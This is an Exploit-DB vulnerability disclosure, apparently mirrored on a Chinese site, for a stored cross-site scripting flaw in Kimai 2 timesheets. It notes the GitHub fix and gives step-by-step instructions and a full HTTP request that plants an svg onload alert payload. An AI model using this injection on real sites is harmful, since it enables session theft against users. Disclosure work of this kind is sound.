Kimai 2 – Persistent Cross-Site Scripting

  • 作者: osamaalaa
    日期: 2019-08-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47286/
  • # Exploit Title: Kimai 2- persistent cross-site scripting (XSS)
    # Date: 07/15/2019
    # Exploit Author: osamaalaa
    # Vendor Homepage: [link]
    # Software Link: https://github.com/kevinpapst/kimai2
    # Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
    # Version: 2
    
    1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create
    
    2-Add this payload "><svg/onload=alert('xss')> in the description
    
    3-Save The changes
    
    4-refresh and we have alert pop up!
    
    The Request POC :
    
    POST /index.php/en/timesheet/create HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 392
    Connection: close
    Referer: http://localhost
    Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv
    
    timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= "><svg/onload=alert('xss')>&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0